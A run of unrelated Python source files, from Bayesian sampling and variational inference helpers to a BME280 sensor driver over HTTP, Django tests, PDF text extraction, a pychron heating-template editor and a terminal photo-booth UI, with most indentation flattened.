r[name] += (leap_frog_step/2) * target_f.__globals__[name].grad
potential = get_potential(target, r)
log_accept = potential - potential_trace[-1]
#print(log_accept,potential,potential_trace[-1])
#print(log_accept)
if log_accept > 0 or (torch.rand(1) < torch.exp(log_accept)).item():
#print('accept',)
trace[-1] = {name: target_f.__globals__[name].detach() for name in pd}
potential_trace[-1] = potential
return trace
current_target_f = None
from functools import wraps
def cache_target_f(f):
@wraps(f)
def _f(target_f,*args,**kwargs):
global current_target_f
current_target_f = target_f
return f(target_f,*args,**kwargs)
return _f
@cache_target_f
def vb(target_f,method='meanfield', *args, **kwargs):
return globals()[f'vb_{method}'](target_f, *args, **kwargs)
@cache_target_f
def sampling(target_f,method='hmc',*args,**kwargs):
return globals()[f'sampling_{method}'](target_f,*args,**kwargs)
@cache_target_f
def optimizing(target_f, lr=0.01, n_epoch = 1000):
parameters_dict = collect_parameters(target_f)
optimizer = torch.optim.SGD(parameters_dict.values(), lr=lr)
for epoch in range(n_epoch):
optimizer.zero_grad()
target = target_f()
loss = -target
loss.backward()
optimizer.step()
def reset(target_f = None):
if target_f is None:
if current_target_f is None:
return
target_f = current_target_f
for name,variable in collect_parameters(target_f).items():
del target_f.__globals__[name]
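# Minimal usage sketch (not part of the original module): a toy model that estimates
# the mean of three observations. The names `mu`, `obs` and `model` are illustrative;
# any function whose globals hold Parameter/Data instances is handled the same way.
if __name__ == '__main__':
    mu = Parameter([0.0])
    obs = Data([1.0, 2.0, 3.0])
    def model():
        # unnormalized log joint: N(mu; 0, 10) prior plus N(obs; mu, 1) likelihood
        prior = torch.distributions.Normal(0.0, 10.0).log_prob(mu).sum(0)
        likelihood = torch.distributions.Normal(mu, 1.0).log_prob(obs).sum(0)
        return prior + likelihood
    q_dis = vb(model, method='meanfield', n_epoch=200, lr=0.05)
    print({name: param['loc'] for name, param in q_dis.params.items()})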
|
"""
Copyright (C) 2020 Piek Solutions LLC
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import requests
import binascii
from codecs import getencoder
import time
def enforce_hex(addr):
if type(addr) == int and addr < 256:
return hex(addr).lstrip('0x')
elif type(addr) == str:
return addr.lstrip('0x')
else:
raise ValueError('addr must be hex string or int < 256')
def scanI2c(ip):
"""
scans devices on i2c bus
:return: list of hex string addresses present on i2c bus
"""
try:
req_url = 'http://' + ip + '/i2c/scan'
resp = requests.get(url=req_url)
return resp.content.decode('utf-8')
except ValueError:
print("i2c failed scan")
class I2cHttpDevice:
def __init__(self, ip, dev_addr):
# device address should be hex string
self.url = 'http://' + ip + '/i2c/'
self.dev_addr = enforce_hex(dev_addr)
def read(self, reg_addr, len_read):
"""
read len_read bytes starting from register reg_addr
:param reg_addr: (str) register address to read in hex
:param len_read: (int) number of bytes to read
:return: bytestring of data
"""
assert len_read < 256, "num of bytes to read cannot exceed 255"
hex_reg_addr = enforce_hex(reg_addr)
try:
req_url = '%sread/%s/%s/%d' % (self.url, self.dev_addr, hex_reg_addr, len_read)
resp = requests.get(url=req_url)
return binascii.a2b_hex(resp.content)
except ValueError:
print("i2c failed read")
def write(self, reg_addr, data, len_data=0):
"""
:param reg_addr: (str) register address to write to in hex
:param data: (str or bytes) hex-encoded bytes, ie: '014ce8'
:param len_data: (optional int) dummy variable to support code portability
:return: None
"""
hex_reg_addr = enforce_hex(reg_addr)
if type(data) == bytes:
# to work across python 2+3:
# https://izziswift.com/whats-the-correct-way-to-convert-bytes-to-a-hex-string-in-python-3/
data = getencoder('hex')(data)[0].decode('ascii')
try:
req_url = '%swrite/%s/%s/%s' % (self.url, self.dev_addr, hex_reg_addr, data)
requests.get(url=req_url)
except ValueError:
print("i2c device 0x%s failed write" % self.dev_addr)
class BME280(I2cHttpDevice):
"""
Bosch BME280
https://www.bosch-sensortec.com/media/boschsensortec/downloads/datasheets/bst-bme280-ds002.pdf
code adapted from BME280.py, http://abyz.me.uk/rpi/pigpio/examples.html (2016-08-05)
This example shows that porting the original code to use the Wifi
Papaya Controller is straightforward and minimal
"""
_calib00 = 0x88
_T1 = 0x88 - _calib00
_T2 = 0x8A - _calib00
_T3 = 0x8C - _calib00
_P1 = 0x8E - _calib00
_P2 = 0x90 - _calib00
_P3 = 0x92 - _calib00
_P4 = 0x94 - _calib00
_P5 = 0x96 - _calib00
_P6 = 0x98 - _calib00
_P7 = 0x9A - _calib00
_P8 = 0x9C - _calib00
_P9 = 0x9E - _calib00
_H1 = 0xA1 - _calib00
_chip_id = 0xD0
_reset = 0xE0
_calib26 = 0xE1
_H2 = 0xE1 - _calib26
_H3 = 0xE3 - _calib26
_xE4 = 0xE4 - _calib26
_xE5 = 0xE5 - _calib26
_xE6 = 0xE6 - _calib26
_H6 = 0xE7 - _calib26
_ctrl_hum = 0xF2
_status = 0xF3
_ctrl_meas = 0xF4
_config = 0xF5
_rawdata = 0xF7
_press = 0xF7
_temp = 0xFA
_humid = 0xFD
_p_msb = 0xF7 - _rawdata
_p_lsb = 0xF8 - _rawdata
_p_xlsb = 0xF9 - _rawdata
_t_msb = 0xFA - _rawdata
_t_lsb = 0xFB - _rawdata
_t_xlsb = 0xFC - _rawdata
_h_msb = 0xFD - _rawdata
_h_lsb = 0xFE - _rawdata
_os_ms = [0, 1, 2, 4, 8, 16]
def __init__(self, i2c_conn, gpib_addr, sampling):
super().__init__(i2c_conn, gpib_addr)
# additional initialization procedure
self.sampling = sampling
self._load_calibration()
self.measure_delay = self._measurement_time(sampling, sampling, sampling)
self.t_fine = 0.0
def _s16(self, _calib, off):
v = self._u16(_calib, off)
if v > 32767:
v -= 65536
return v
def _u16(self, _calib, off):
return _calib[off] | (_calib[off + 1] << 8)
def _u8(self, _calib, off):
return _calib[off]
def _s8(self, _calib, off):
v = self._u8(_calib, off)
if v > 127:
v -= 256
return v
def _measurement_time(self, os_temp, os_press, os_hum):
ms = ((1.25 + 2.3 * self._os_ms[os_temp]) +
(0.575 + 2.3 * self._os_ms[os_press]) +
(0.575 + 2.3 * self._os_ms[os_hum]))
return ms / 1000.0
def _load_calibration(self):
d1 = self.read(self._calib00, 26)
self.T1 = self._u16(d1, self._T1)
self.T2 = self._s16(d1, self._T2)
self.T3 = self._s16(d1, self._T3)
self.P1 = self._u16(d1, self._P1)
self.P2 = self._s16(d1, self._P2)
self.P3 = self._s16(d1, self._P3)
self.P4 = self._s16(d1, self._P4)
self.P5 = self._s16(d1, self._P5)
self.P6 = self._s16(d1, self._P6)
self.P7 = self._s16(d1, self._P7)
self.P8 = self._s16(d1, self._P8)
self.P9 = self._s16(d1, self._P9)
self.H1 = self._u8(d1, self._H1)
d2 = self.read(self._calib26, 7)
self.H2 = self._s16(d2, self._H2)
self.H3 = self._u8(d2, self._H3)
t = self._u8(d2, self._xE5)
t_l = t & 15
t_h = (t >> 4) & 15
self.H4 = (self._u8(d2, self._xE4) << 4) | t_l
if self.H4 > 2047:
self.H4 -= 4096
self.H5 = (self._u8(d2, self._xE6) << 4) | t_h
if self.H5 > 2047:
self.H5 -= 4096
self.H6 = self._s8(d2, self._H6)
def _read_raw_data(self):
# write control bytes for oversampling config
self.write(self._ctrl_hum, bytes([self.sampling]), 1)
self.write(self._ctrl_meas, bytes([self.sampling << 5 | self.sampling << 2 | 1]), 1)
time.sleep(self.measure_delay)
# read 8 bytes starting from register self._rawdata
d = self.read(self._rawdata, 8)
# print(''.join(format(x, '02x') for x in d))
msb = d[self._t_msb]
lsb = d[self._t_lsb]
xlsb = d[self._t_xlsb]
raw_t = ((msb << 16) | (lsb << 8) | xlsb) >> 4
msb = d[self._p_msb]
lsb = d[self._p_lsb]
xlsb = d[self._p_xlsb]
raw_p = ((msb << 16) | (lsb << 8) | xlsb) >> 4
msb = d[self._h_msb]
lsb = d[self._h_lsb]
raw_h = (msb << 8) | lsb
return raw_t, raw_p, raw_h
def read_temp(self):
# write measurement control byte
self.write(self._ctrl_meas, bytes([self.sampling << 5 | self.sampling << 2 | 1]), 1)
time.sleep(self.measure_delay)
# read 3 bytes starting from register self._temp
d = self.read(self._temp, 3)
# print(''.join(format(x, '02x') for x in d))
msb, lsb, xlsb = d
raw_t = ((msb << 16) | (lsb << 8) | xlsb) >> 4
var1 = (raw_t / 16384.0 - (self.T1) / 1024.0) * float(self.T2)
var2 = (((raw_t) / 131072.0 - (self.T1) / 8192.0) *
((raw_t) / 131072.0 - (self.T1) / 8192.0)) * (self.T3)
self.t_fine = var1 + var2
t = (var1 + var2) / 5120.0
return t
def read_data(self):
raw_t, raw_p, raw_h = self._read_raw_data()
var1 = (raw_t / 16384.0 - (self.T1) / 1024.0) * float(self.T2)
var2 = (((raw_t) / 131072.0 - (self.T1) / 8192.0) *
((raw_t) / 131072.0 - (self.T1) / 8192.0)) * (self.T3)
self.t_fine = var1 + var2
t = (var1 + var2) / 5120.0
var1 = (self.t_fine / 2.0) - 64000.0
var2 = var1 * var1 * self.P6 / 32768.0
var2 = var2 + (var1 * self.P5 * 2.0)
var2 = (var2 / 4.0) + (self.P4 * 65536.0)
var1 = ((self.P3 * var1 * var1 / 524288.0) + (self.P2 * var1)) / 524288.0
var1 = (1.0 + var1 / 32768.0) * self.P1
if var1 != 0.0:
p = 1048576.0 - raw_p
p = (p - (var2 / 4096.0)) * 6250.0 / var1
var1 = self.P9 * p * p / 2147483648.0
var2 = p * self.P8 / 32768.0
p = p + (var1 + var2 + self.P7) / 16.0
else:
p = 0
h = self.t_fine - 76800.0
h = ((raw_h - ((self.H4) * 64.0 + (self.H5) / 16384.0 * h)) *
((self.H2) / 65536.0 * (1.0 + (self.H6) / 67108864.0 * h *
(1.0 + (self.H3) / 67108864.0 * h))))
h = h * (1.0 - self.H1 * h / 524288.0)
if h > 100.0:
h = 100.0
elif h < 0.0:
h = 0.0
return t, p, h
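# Minimal usage sketch (not part of the original module): the controller IP and the
# sensor's i2c address (0x76) are assumptions; adjust them for the actual setup.
if __name__ == '__main__':
    controller_ip = '192.168.1.50'
    print(scanI2c(controller_ip))
    sensor = BME280(controller_ip, 0x76, 1)  # oversampling x1
    temperature, pressure, humidity = sensor.read_data()
    print('%.2f degC  %.1f Pa  %.1f %%RH' % (temperature, pressure, humidity))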
|
"""
:mod:`asp_cml` Alexander Street Press Classical Music Library Job
"""
__author__ = "Jeremy Nelson"
from asp_base import AlexanderStreetPressMusicJob
class AlexanderStreetPressClassicalMusicLibrary(AlexanderStreetPressMusicJob):
def __init__(self,marc_file,**kwargs):
"""
Creates instance of `AlexanderStreetPressClassicalMusicLibrary`
"""
kwargs['asp_code'] = 'clmu'
kwargs['proxy'] = '0-clmu.alexanderstreet.com.tiger.coloradocollege.edu'
AlexanderStreetPressMusicJob.__init__(self,marc_file,**kwargs)
|
from django.shortcuts import reverse
from model_bakery import baker
from ..models import EnvironmentProject
from glitchtip.test_utils.test_case import GlitchTipTestCase
class EnvironmentTestCase(GlitchTipTestCase):
def setUp(self):
self.create_user_and_project()
self.url = reverse(
"organization-environments-list",
kwargs={"organization_slug": self.organization.slug},
)
def test_environments(self):
environment = baker.make(
"environments.Environment", organization=self.organization
)
baker.make(
"environments.EnvironmentProject",
environment=environment,
project=self.project,
)
other_environment = baker.make("environments.Environment")
baker.make(
"environments.EnvironmentProject",
environment=other_environment,
project=self.project,
)
res = self.client.get(self.url)
self.assertContains(res, environment.name)
self.assertNotContains(res, other_environment.name)
def test_hide_environments(self):
environment_project1 = baker.make(
"environments.EnvironmentProject",
project=self.project,
environment__organization=self.organization,
is_hidden=False,
)
environment_project2 = baker.make(
"environments.EnvironmentProject",
project=self.project,
environment__organization=self.organization,
is_hidden=True,
)
res = self.client.get(self.url)
self.assertContains(res, environment_project1.environment.name)
self.assertNotContains(res, environment_project2.environment.name)
class EnvironmentProjectTestCase(GlitchTipTestCase):
def setUp(self):
self.create_user_and_project()
def test_environment_projects(self):
url = reverse(
"project-environments-list",
kwargs={"project_pk": f"{self.organization.slug}/{self.project.slug}"},
)
environment_project = baker.make(
"environments.EnvironmentProject",
project=self.project,
environment__organization=self.organization,
)
other_environment_project = baker.make("environments.EnvironmentProject")
another_environment_project = baker.make(
"environments.EnvironmentProject",
environment__organization=self.organization,
)
res = self.client.get(url)
self.assertContains(res, environment_project.environment.name)
self.assertNotContains(res, other_environment_project.environment.name)
self.assertNotContains(res, another_environment_project.environment.name)
def test_make_hidden(self):
environment_project = baker.make(
"environments.EnvironmentProject",
is_hidden=False,
project=self.project,
environment__organization=self.organization,
)
detail_url = reverse(
"project-environments-detail",
kwargs={
"project_pk": f"{self.organization.slug}/{self.project.slug}",
"environment__name": environment_project.environment.name,
},
)
data = {"name": environment_project.environment.name, "isHidden": True}
res = self.client.put(detail_url, data)
self.assertContains(res, "true")
self.assertTrue(EnvironmentProject.objects.filter(is_hidden=True).exists())
|
import torch
from torchsupport.flex.checkpointing.savable import (
savable_of, Savable, SaveStateError
)
@savable_of(torch.nn.Module)
class SaveModule(Savable):
def __init__(self, module):
if isinstance(module, torch.nn.DataParallel):
module = module.module
self.module = module
def write(self, data, name):
for param in self.module.parameters():
if torch.isnan(param).any():
raise SaveStateError("Encountered NaN weights!")
data[name] = self.module.state_dict()
def read(self, data, name):
self.module.load_state_dict(data[name])
@savable_of(torch.Tensor)
class SaveTensor(Savable):
def __init__(self, tensor):
self.tensor = tensor
def write(self, data, name):
data[name] = self.tensor
def read(self, data, name):
self.tensor[:] = data[name]
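# Minimal usage sketch (not part of the original module): round-trip a module's weights
# through a plain dict, the way a checkpoint writer might drive these wrappers.
if __name__ == "__main__":
  net = torch.nn.Linear(4, 2)
  checkpoint = {}
  SaveModule(net).write(checkpoint, "net")
  restored = torch.nn.Linear(4, 2)
  SaveModule(restored).read(checkpoint, "net")
  torch.save(checkpoint, "checkpoint.pt")  # illustrative file name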
|
import io
from pdfminer.converter import TextConverter
from pdfminer.pdfinterp import PDFPageInterpreter
from pdfminer.pdfinterp import PDFResourceManager
from pdfminer.pdfpage import PDFPage
def extract_text_from_pdf(pdf_path):
"""Extract the content of a PDF file as text."""
resource_manager = PDFResourceManager()
fake_file_handle = io.StringIO()
converter = TextConverter(resource_manager, fake_file_handle)
page_interpreter = PDFPageInterpreter(resource_manager, converter)
with open(pdf_path, 'rb') as fh:
for page in PDFPage.get_pages(fh,
caching=True,
check_extractable=True):
page_interpreter.process_page(page)
text = fake_file_handle.getvalue()
# close open handles
converter.close()
fake_file_handle.close()
if text:
return text
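# Minimal usage sketch (not part of the original module); the file name is illustrative.
if __name__ == '__main__':
    print(extract_text_from_pdf('example.pdf'))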
|
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
import csv
import os
from traits.api import HasTraits, Float, Enum, List, Int, \
File, Property, Button, on_trait_change, Any, Event, cached_property
from traits.trait_errors import TraitError
from traitsui.api import View, UItem, HGroup, Item, spring, VGroup
from traitsui.tabular_adapter import TabularAdapter
from pychron.core.helpers.strtools import to_csv_str
from pychron.core.ui.enum_editor import myEnumEditor
from pychron.core.ui.tabular_editor import myTabularEditor
from pychron.envisage.icon_button_editor import icon_button_editor
from pychron.experiment.utilities.save_dialog import IncrementalHeatTemplateSaveDialog
from pychron.paths import paths
from pychron.pychron_constants import alphas
from pychron.viewable import Viewable
# paths.build('_experiment')
# build_directories(paths)
class BaseIncrementalHeatAdapter(TabularAdapter):
columns = [('Step', 'step_id'),
('Value', 'value'),
('Units', 'units'),
('Duration (s)', 'duration'),
('Cleanup (s)', 'cleanup')]
step_id_width = Int(40)
step_id_text = Property
units_text = Property
def _get_units_text(self):
return self.item.units
def _set_units_text(self, v):
try:
self.item.units = v
except TraitError:
pass
def _get_step_id_text(self):
return alphas(self.item.step_id - 1)
class LaserIncrementalHeatAdapter(BaseIncrementalHeatAdapter):
columns = [('Step', 'step_id'),
('Value', 'value'),
('Units', 'units'),
('Duration (s)', 'duration'),
('Cleanup (s)', 'cleanup'),
('Beam Diameter', 'beam_diameter')]
beam_diameter_text = Property
def _get_beam_diameter_text(self):
bd = self.item.beam_diameter
if bd is None:
bd = ''
return bd
class BaseIncrementalHeatStep(HasTraits):
step_id = Int
duration = Float
cleanup = Float
value = Float
units = Enum('watts', 'temp', 'percent')
# is_ok = Property
step = Property(depends_on='step_id')
@cached_property
def _get_step(self):
return alphas(self.step_id - 1)
def make_row(self):
return self.value, self.units, self.duration, self.cleanup
def make_dict(self, gdur, gcleanup):
dur = self.duration
if not dur:
dur = gdur
cleanup = self.cleanup
if not cleanup:
cleanup = gcleanup
d = dict(extract_value=self.value,
extract_units=self.units,
duration=dur,
cleanup=cleanup)
return d
def to_string(self):
return to_csv_str(self.make_row())
@property
def is_valid(self):
return self.value and self.duration
class LaserIncrementalHeatStep(BaseIncrementalHeatStep):
beam_diameter = Property(depends_on='_beam_diameter')
_beam_diameter = Float(default_value=None)
def make_dict(self, gdur, gcleanup):
d = super(LaserIncrementalHeatStep, self).make_dict(gdur, gcleanup)
if self.beam_diameter is not None:
d['beam_diameter'] = self.beam_diameter
return d
def make_row(self):
return self.value, self.units, self.duration, \
self.cleanup, self.beam_diameter if self.beam_diameter is not None else ''
def _get_beam_diameter(self):
return self._beam_diameter
def _set_beam_diameter(self, v):
self._beam_diameter = v
class BaseIncrementalHeatTemplate(Viewable):
steps = List
step_klass = BaseIncrementalHeatStep
adapter_klass = BaseIncrementalHeatAdapter
name = Property(depends_on='path')
path = File
names = List
save_button = Button('save')
save_as_button = Button('save as')
add_row = Button('add step')
title = Property
selected = Any
refresh_needed = Event
units = Enum('', 'watts', 'temp', 'percent')
gduration = Float
gcleanup = Float
# ===============================================================================
# persistence
# ===============================================================================
def load(self, path):
self.path = path
self.steps = []
with open(path, 'r') as rfile:
reader = csv.reader(rfile)
header = next(reader)
cnt = 1
for row in reader:
if row:
params = self._parse_row(row, header)
step = self.step_klass(step_id=cnt,
**params)
self.steps.append(step)
cnt += 1
def dump(self, path):
with open(path, 'w') as wfile:
writer = csv.writer(wfile)
header = ('value', 'units', 'duration', 'cleanup', 'beam_diameter')
writer.writerow(header)
for step in self.steps:
writer.writerow(step.make_row())
# private
def _parse_row(self, row, header):
params = dict()
for a, cast in (('value', float), ('units', str),
('duration', float), ('cleanup', float)):
idx = header.index(a)
params[a] = cast(row[idx])
return params
def _gduration_changed(self):
self._set_steps_attr('duration', self.gduration)
def _gcleanup_changed(self):
self._set_steps_attr('cleanup', self.gcleanup)
def _units_changed(self):
self._set_steps_attr('units', self.units)
def _set_steps_attr(self, attr, v):
steps = self.selected
if not steps:
steps = [s for s in self.steps if s.value]
for si in steps:
setattr(si, attr, v)
self.refresh_needed = True
def _get_title(self):
if self.path:
return os.path.basename(self.path)
else:
return ' '
def _steps_default(self):
return [self.step_klass(step_id=i + 1) for i in range(20)]
def _get_name(self):
return os.path.basename(self.path)
def _set_name(self, v):
self.load(os.path.join(paths.incremental_heat_template_dir, v))
# def _calculate_similarity(self, template2):
# with open(self.path, 'r') as rfile:
# s1 = rfile.read()
#
# with open(template2.path, 'r') as rfile:
# s2 = rfile.read()
#
# e = 0
# s1s = [l for l in s1.splitlines() if l.split(',')!=0.0]
# s2s = [l for l in s1.splitlines() if l.split(',')!=0.0]
#
# if len
# diff = ndiff(s1.splitlines(), s2.splitlines(), linejunk=lambda x: x.sp)
# for line in diff:
# if line[0] == '?':
# e += 1
#
# print line
# print e
# return e
#
# def _check_similarity(self):
# sims = []
# temps = list_directory(paths.incremental_heat_template_dir, extension='.txt')
# for ti in temps:
# if ti == self.name:
# continue
#
# t = self.__class__()
# p = os.path.join(paths.incremental_heat_template_dir, ti)
# try:
# t.load(p)
# except BaseException:
# self.debug('invalid template {}. removing this file'.format(p))
# os.remove(p)
# continue
#
# e = self._calculate_similarity(t)
# if e < 10:
# sims.append(ti)
# return sims
# ===============================================================================
# handlers
# ===============================================================================
@on_trait_change('steps[]')
def _steps_updated(self):
for i, si in enumerate(self.steps):
si.step_id = i + 1
def _add_row_fired(self):
if self.selected:
for si in self.selected:
step = si.clone_traits()
self.steps.append(step)
else:
if self.steps:
step = self.steps[-1].clone_traits()
else:
step = self.step_klass()
self.steps.append(step)
def _save_button_fired(self):
# sims = self._check_similarity()
# if sims:
# if not self.confirmation_dialog('Similar templates already exist. \n{}\n'
# 'Are you sure you want to save this template?'.format('\n'.join(sims))):
# return
self.dump(self.path)
self.close_ui()
def _save_as_button_fired(self):
# sims = self._check_similarity()
# if sims:
# if not self.confirmation_dialog('Similar templates already exist. {}\n '
# 'Are you sure you want to save this template?'.format(','.join(sims))):
# return
steps = [s for s in self.steps if s.is_valid]
n = len(steps)
dlg = IncrementalHeatTemplateSaveDialog(n=n, root=paths.incremental_heat_template_dir)
path = dlg.get_path()
if path:
self.dump(path)
self.path = path
self.close_ui()
def traits_view(self):
editor = myTabularEditor(adapter=self.adapter_klass(),
refresh='refresh_needed',
selected='selected',
# copy_cache='copy_cache',
# pasted='pasted',
multi_select=True)
# cols=[ObjectColumn(name='step', label='Step', editable=False),
# ObjectColumn(name='value',label='Value'),
# ObjectColumn(name='units',label='Units'),
# ObjectColumn(name='duration', label='Duration (S)'),
# ObjectColumn(name='cleanup', label='Cleanup (S)')]
#
# editor=TableEditor(columns=cols, selected='selected',
# deletable=True,
# show_toolbar=True,
# selection_mode='rows', sortable=False)
v = View(VGroup(HGroup(UItem('name', editor=myEnumEditor(name='names')),
icon_button_editor('add_row', 'table_add'), spring,
Item('gduration', label='Duration'),
Item('gcleanup', label='Cleanup'),
Item('units')),
UItem('steps',
style='custom',
editor=editor),
HGroup(UItem('save_button', enabled_when='path'),
UItem('save_as_button'))),
height=500,
width=900,
resizable=True,
title=self.title,
handler=self.handler_klass)
return v
class LaserIncrementalHeatTemplate(BaseIncrementalHeatTemplate):
step_klass = LaserIncrementalHeatStep
adapter_klass = LaserIncrementalHeatAdapter
def _parse_row(self, row, header):
params = super(LaserIncrementalHeatTemplate, self)._parse_row(row, header)
try:
idx = header.index('beam_diameter')
except ValueError:
idx = None
if idx is not None:
v = row[idx]
if v.strip():
try:
params['beam_diameter'] = float(v)
except ValueError:
self.warning('Invalid beam_diameter value {}'.format(v))
return params
if __name__ == '__main__':
paths.build('_dev')
im = LaserIncrementalHeatTemplate()
im.load(os.path.join(paths.incremental_heat_template_dir,
'a.txt'
))
# for i in range(10):
# im.steps.append(IncrementalHeatStep(step_id=i + 1))
im.configure_traits()
# ============= EOF =============================================
|
#!/usr/bin/env python
import xml.dom.ext
from xml.dom.ext.reader import Sax2
from xml import xpath
filename = "example.xml"
print "Demo started."
reader = Sax2.Reader()
doc = reader.fromStream(filename)
#xml.dom.ext.PrettyPrint(doc)
#xml.dom.ext.Print(doc)
mod_list = xpath.Evaluate('/configuration/module', doc.documentElement)
for mod in mod_list:
name = xpath.Evaluate("@name", mod)[0].nodeValue
print "Module Name: %s" % name
param_list = xpath.Evaluate('parameter', mod)
for param in param_list:
name = xpath.Evaluate('@name', param)[0].nodeValue
val = xpath.Evaluate('text()', param)[0].nodeValue
print "%s = %s" % (name, val)
|
''' cat that kitten '''
from catms import app
if __name__ == '__main__':
app.run()
|
import logging
from datetime import datetime
from gettext import translation
from typing import Any, Callable
from asciimatics.effects import Effect, Print
from asciimatics.event import Event, KeyboardEvent
from asciimatics.exceptions import NextScene, StopApplication
from asciimatics.renderers import Box, ColourImageFile, StaticRenderer
from asciimatics.screen import Screen
from asciimatics.widgets import (
Button, CheckBox, FileBrowser, Frame, Label, Layout
)
from skunkbooth.utils.dropdownlist import \
DropdownList # Delete this on next asciimatics release
from skunkbooth.utils.settings import settings
from .webcam import Webcam
temp = translation("base", localedir="locales", languages=[settings["LANGUAGE"]])
temp.install()
_ = temp.gettext
APP_TITLE = _("Skunkbooth")
class ImageSelectionModel(object):
"""Model to hold selected image path"""
def __init__(self, path: str = "") -> None:
"""Initialize model"""
self._path = path
def set_path(self, path: str) -> None:
"""Setter"""
self._path = path
def get_path(self) -> str:
"""Getter"""
return self._path
class MainFrame(Frame):
"""Recreatable frame to implement main ui"""
def __init__(
self, screen: Any, webcam: Webcam, toggle: Callable, camera_effect: Effect
) -> None:
"""Initialize frame"""
super(MainFrame, self).__init__(
screen,
3,
screen.width - 4,
x=2,
y=screen.height - 4,
hover_focus=True,
can_scroll=False,
title=APP_TITLE,
has_border=False,
reduce_cpu=True,
)
# Made the labels below short so as to fit small screens
self._gallery_button = Button(_("🖼 Gallery"), self._gallery, add_box=True)
self._effects_button = Button(_("🖌 Effects"), self._filters, add_box=True)
self._camera_button = Button(_("📷 Shoot"), self._shoot, add_box=True)
self._settings_button = Button(_("🔧 Settings"), self._settings, add_box=True)
self._video_recording = CheckBox(_("⏯︎ Record"), on_change=toggle)
self._quit_button = Button(_("🛑 Quit"), self._quit, add_box=True)
box = Box(screen.width, screen.height, uni=True)
box_effect = Print(screen, box, y=0)
self.add_effect(box_effect)
title_effect = Print(
screen,
StaticRenderer(images=[" " + APP_TITLE + " "]),
y=0,
transparent=False,
x=int(((screen.width - 4) / 2) - 5),
attr=1,
)
self.add_effect(title_effect)
self.add_effect(camera_effect)
controls_layout = Layout([1, 1, 1, 1, 1, 1])
self.add_layout(controls_layout)
controls_layout.add_widget(self._gallery_button, 0)
controls_layout.add_widget(self._video_recording, 1)
controls_layout.add_widget(self._camera_button, 2)
controls_layout.add_widget(self._effects_button, 3)
controls_layout.add_widget(self._settings_button, 4)
controls_layout.add_widget(self._quit_button, 5)
self.set_theme("bright")
self.fix()
self.webcam = webcam
logging.debug("Mainframe initialized")
@staticmethod
def _filters() -> None:
"""Open effects"""
logging.debug("Effects was clicked")
raise NextScene("Filters")
@staticmethod
def _gallery() -> None:
"""Open gallery"""
logging.debug("Gallery was clicked")
raise NextScene("Gallery")
# @staticmethod
def _shoot(self) -> None:
"""Take an image"""
logging.debug("Camera was clicked")
if settings["IMG_FORMAT"] == "ASCII":
ext = ".txt"
else:
ext = f".{settings['IMG_FORMAT']}"
img_name = (
f"{settings['PIC_DIR']}/Image-{datetime.now().strftime('%Y-%m-%d-%H-%M-%S')}{ext}"
)
logging.info(f"Saving image {img_name}")
self.webcam.take_picture_and_save(img_name)
self._screen.refresh()
def _settings(self) -> None:
"""Go to settings page"""
logging.debug("Settings was clicked")
raise NextScene("Settings")
@staticmethod
def _quit() -> None:
"""Quit application"""
logging.debug("Application was stopped")
raise StopApplication("User pressed quit")
class GalleryFrame(Frame):
"""Recreatable frame to implement gallery ui"""
def __init__(self, screen: Any, model: ImageSelectionModel) -> None:
"""Initialize frame"""
super(GalleryFrame, self).__init__(
screen,
screen.height,
screen.width,
y=0,
hover_focus=True,
has_border=True,
can_scroll=False,
on_load=self._render_browser,
title=APP_TITLE,
reduce_cpu=True,
)
self._model = model
self._back_camera_button = Button(_("👈 Back to 📷"), self._switch_to_camera, add_box=True)
title_layout = Layout([1])
self.add_layout(title_layout)
self.files_layout = Layout([100], fill_frame=True)
self.add_layout(self.files_layout)
controls_layout = Layout([1, 1, 1])
self.add_layout(controls_layout)
title_layout.add_widget(Label(_("Gallery"), align="^", height=screen.height // 16))
controls_layout.add_widget(self._back_camera_button, 1)
self.set_theme("bright")
logging.debug("Galleryframe initialized")
def _render_browser(self) -> None:
"""Open file browser"""
logging.debug("File browser opened")
self.files_layout.clear_widgets()
self._browser = FileBrowser(
self.screen.height - 8, settings["PIC_DIR"], on_select=self._open_image
)
self.files_layout.add_widget(self._browser)
self.fix()
def _open_image(self) -> None:
"""Opening image preview"""
if self._browser.value.endswith(".jpg"):
logging.info(f"Image selected in gallery :{self._browser.value}")
self._model.set_path(self._browser.value)
raise NextScene("Preview")
@staticmethod
def _switch_to_camera() -> None:
"""Switch to Camera from Gallery"""
logging.debug("Switched to Camera from Gallery")
raise NextScene("Main")
class FilterFrame(Frame):
"""Recreatable frame to implement filter ui"""
def __init__(self, screen: Any, filters: Any, data: Any = None) -> None:
"""Initialize frame"""
super().__init__(
screen,
screen.height,
screen.width,
hover_focus=True,
can_scroll=True,
title=APP_TITLE,
data=data,
reduce_cpu=True,
)
